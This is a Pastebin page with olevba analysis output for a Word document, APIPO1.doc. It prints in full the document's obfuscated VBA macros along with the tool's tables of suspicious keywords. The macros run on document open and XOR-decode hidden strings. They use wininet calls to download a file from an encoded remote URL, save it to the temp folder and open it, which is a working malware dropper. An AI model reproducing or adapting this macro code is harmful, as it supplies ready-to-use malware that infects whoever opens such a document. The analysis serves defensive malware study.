Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB- APIPO1.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: APIPO1.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: APIPO1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub autoopen()
- ALBACAL3
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO OIDL8.bas
- in file: APIPO1.doc - OLE stream: u'Macros/VBA/OIDL8'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub ALBACAL3()
- Dim CHEG As Integer
- CHEG = 81
- ITSALLABAMA (CHEG)
- End Sub
- Public Function KALLKKKASKAJJAS(IIIIIBRDA1 As String, IIIIIBRDA2 As String) As String
- Dim ZINGMAH30 As Long
- Dim ZINGMAH30O As String
- Dim ZINGMAH300 As Integer
- Dim ZINGMAH3001 As Integer
- For ZINGMAH30 = 1 _
- To _
- ( _
- LEFUNCLE1 _
- (IIIIIBRDA2) _
- / 2)
- ZINGMAH300 = Val("&H" & _
- (Mid$(IIIIIBRDA2, _
- (2 * ZINGMAH30) - 1, 2)))
- ZINGMAH3001 = Asc(Mid$(IIIIIBRDA1, _
- ((ZINGMAH30 Mod Len(IIIIIBRDA1)) + 1), 1))
- ZINGMAH30O = ZINGMAH30O + Chr(ZINGMAH300 Xor ZINGMAH3001)
- Next ZINGMAH30
- KALLKKKASKAJJAS = ZINGMAH30O
- End Function
- Public Function LEFUNCLE1(Papapa1 As String) As Integer
- LEFUNCLE1 = Len(Papapa1)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+---------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+---------+-----------------------------------------+
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- +------------+---------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO PIDLE0.bas
- in file: APIPO1.doc - OLE stream: u'Macros/VBA/PIDLE0'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- #If VBA7 And Win64 Then
- Public Declare PtrSafe Function SEEEGMATICKS1222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
- Public Declare PtrSafe Function SEEEGMATICKS122 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
- Public Declare PtrSafe Function SEEEGMATICKS21 Lib "wininet.dll" Alias "InternetReadFile" (ByVal cCCc3333 As LongPtr, ByVal SA33LOOOOMMA442 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
- Public Declare PtrSafe Function SEEEGMATICKS1 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
- #Else
- Public Declare Function SEEEGMATICKS1222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
- Public Declare Function SEEEGMATICKS122 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
- Public Declare Function SEEEGMATICKS21 Lib "wininet.dll" Alias "InternetReadFile" (ByVal cCCc3333 As Long, ByVal SA33LOOOOMMA442 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
- Public Declare Function SEEEGMATICKS1 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
- #End If
- Public Const WIIIN34DIS6 = "3701130605472B07141A0D0D0D1F1F0219"
- Public Const WIIIN34DIS5 = "38021D0B0D0D0B0753144A0B140E"
- Public Const WIIIN34DIS4 = "0C1D021A5346450F0D170A1D040A1418141B050711440A06075851424B595445131512"
- Public Const WIIIN34DIS3 = "370A0403191D031903582207000E2514040701043908030C0903"
- Public Const WIIIN34DIS2 = "sdivjiijwdvdnlkvmw"
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO IDL4.bas
- in file: APIPO1.doc - OLE stream: u'Macros/VBA/IDL4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub ITSALLABAMA(IHMAPARAM1828 As Long)
- ITSALBATROS ("OOOOOOOAOANNNNNN3112221")
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO FILE6.bas
- in file: APIPO1.doc - OLE stream: u'Macros/VBA/FILE6'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Const THEPARAMK23 = "KAKAJIDO"
- Public _
- Function ITSALBATROS(PERKADO _
- As _
- String)
- Sub1
- End Function
- Public Function Sub1()
- Dim OOOOOOO8888888 As Object
- Set OOOOOOO8888888 = CreateObject _
- (KALLKKKASKAJJAS(WIIIN34DIS2, WIIIN34DIS3))
- Dim KLALAKKSKKNNCN0 As Integer
- For KLALAKKSKKNNCN0 = 0 To 0
- If KLALAKKSKKNNCN0 = 5 Then End
- Next KLALAKKSKKNNCN0
- Dim ETOPART98 As Object
- Set ETOPART98 = Sub2(OOOOOOO8888888)
- Dim ZS67AASCCS As Integer
- For ZS67AASCCS = 0 To 0
- If ZS67AASCCS = 5 Then End
- Next ZS67AASCCS
- Dim HAZ82767
- ASDFKJF = KALLKKKASKAJJAS(WIIIN34DIS2, WIIIN34DIS5)
- HAZ82767 = ETOPART98 & ASDFKJF
- Dim LOOO9371003942732 As Integer
- For LOOO9371003942732 = 6 To 10
- If LOOO9371003942732 = 5 Then End
- Next LOOO9371003942732
- 'Set OOOOOOO8888888 = CreateObject _
- '(KALLKKKASKAJJAS(WIIIN34DIS2, WIIIN34DIS3))
- Dim NSMSBSDSAS7 As Integer
- For NSMSBSDSAS7 = 0 To 0
- If NSMSBSDSAS7 = 5 Then End
- Next NSMSBSDSAS7
- If Sub3(OOOOOOO8888888, HAZ82767) Then
- OOOOOOO8888888. _
- DeleteFile HAZ82767
- End If
- If TDSHKAMPOT2122(HAZ82767) Then
- End If
- Set SSSS = Nothing
- If Sub3(OOOOOOO8888888, HAZ82767) Then
- End If
- Set SASASA = CreateObject _
- (KALLKKKASKAJJAS _
- (WIIIN34DIS2, WIIIN34DIS6))
- SASASA.Open HAZ82767
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO IDL3.bas
- in file: APIPO1.doc - OLE stream: u'Macros/VBA/IDL3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function Sub2(ByRef Ob5 As Object) As Object
- Set Sub2 = Ob5.GetSpecialFolder(2)
- End Function
- Public Function Sub3(ByRef Ob6 As Object, ByVal ascascas As String) As Boolean
- If Ob6.FileExists(ascascas) Then
- Sub3 = True
- Else
- Sub3 = False
- End If
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO SIDL22.bas
- in file: APIPO1.doc - OLE stream: u'Macros/VBA/SIDL22'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Option Explicit
- Private Const IPPTDSH872 = 8162
- Private Const IPPTDSH871 As String = "MisterZALALU"
- Private Const IPPTDSH999 = 1
- Private Const cCCc = &H4000000
- Public Function TDSHKAMPOT2122 _
- (ByVal ITSTO As String) As Boolean
- #If VBA7 _
- And Win64 Then
- Dim LPT1 As LongPtr, LPT2 As LongPtr
- #Else
- Dim LPT1 As Long, LPT2 As Long
- #End If
- Dim CDSFDFD As Long
- Dim SA33LOOOOMMA442 As String * IPPTDSH872, CCEWGREHRHERHER33 As String
- Dim EFEWFWEFWEFWEF As Integer, lddta As Double
- LPT1 = SEEEGMATICKS122(IPPTDSH871, IPPTDSH999, vbNullString, vbNullString, 0)
- If LPT1 = 0 Then
- Exit Function
- End If
- Dim ITSFROM As String
- ITSFROM = KALLKKKASKAJJAS(WIIIN34DIS2, WIIIN34DIS4)
- LPT2 = SEEEGMATICKS1(LPT1, ITSFROM, vbNullString, 0, cCCc, 0)
- If LPT2 = 0 Then
- lddta = 0
- Else
- SEEEGMATICKS21 LPT2, SA33LOOOOMMA442, IPPTDSH872, CDSFDFD
- CCEWGREHRHERHER33 = SA33LOOOOMMA442
- Do While CDSFDFD <> 0
- SEEEGMATICKS21 LPT2, SA33LOOOOMMA442, IPPTDSH872, CDSFDFD
- Dim SSSDFDSFLLSLLS As Integer
- For SSSDFDSFLLSLLS = 0 To 0
- If SSSDFDSFLLSLLS = 5 Then End
- Next SSSDFDSFLLSLLS
- CCEWGREHRHERHER33 = CCEWGREHRHERHER33 + Mid(SA33LOOOOMMA442, 1, CDSFDFD)
- Loop
- lddta = Len(CCEWGREHRHERHER33): EFEWFWEFWEFWEF = FreeFile
- Open ITSTO _
- For Binary _
- Access Write _
- Lock Write _
- As #EFEWFWEFWEFWEF
- Put #EFEWFWEFWEFWEF, _
- , CCEWGREHRHERHER33
- ':
- Dim ssdcdcdsDDDDD As Integer
- For ssdcdcdsDDDDD = 0 To 0
- If ssdcdcdsDDDDD = 5 Then End
- Next ssdcdcdsDDDDD
- Close #EFEWFWEFWEFWEF
- End If
- SEEEGMATICKS1222 LPT2
- SEEEGMATICKS1222 LPT1
- CCEWGREHRHERHER33 = ""
- If lddta Then
- TDSHKAMPOT2122 = True
- End If
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO UserForm1.frm
- in file: APIPO1.doc - OLE stream: u'Macros/VBA/UserForm1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement